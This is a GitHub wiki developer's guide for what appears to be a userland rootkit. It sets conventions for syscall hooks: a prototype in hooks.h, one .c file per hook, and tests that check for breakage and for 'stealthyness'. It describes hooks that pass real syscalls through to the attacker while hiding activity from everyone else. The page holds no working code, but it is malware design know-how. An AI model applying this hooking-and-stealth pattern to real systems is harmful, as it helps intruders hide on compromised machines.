Skip to content

Developer's Guide

Jump to bottom Edit New page
mzap edited this page May 7, 2015 · 12 revisions

Developer's Guide

Hooks

Every hook must have:

  • A prototype in hooks.h
  • An associated .c file
  • A test suite

Our hooks are defined in hooks.h, a C header file that our builder parses to write our config.h, and used during the compilation step. We have to parse the hooks.h file, to generate the list of REAL_HOOKS that will be used to call the real syscall in our config.h (Preventing the use of infected syscalls as the attacker).

Prototype in hooks.h

The prototype must always specify the return type, followed by the real syscall name, separated by a single space. It must end with HOOKED, a macro defined earlier in the header file.

<return_type> <syscall>(args) HOOKED;

Associated .c file

Every hook is done in its singular file. Every hook must call the real syscall when idenfying the attacker, and do whatever you want it to do otherwise, keeping stealth in mind. Our DEBUG macro is there for debugging purpose, and must be present in every hook.

Test suite

Each hook must be tested to assure that no breakage occurs, and to ensure stealthyness. Those tests must be placed in the tests/core-unittests directory.

Add a custom footer
Add a custom sidebar
Clone this wiki locally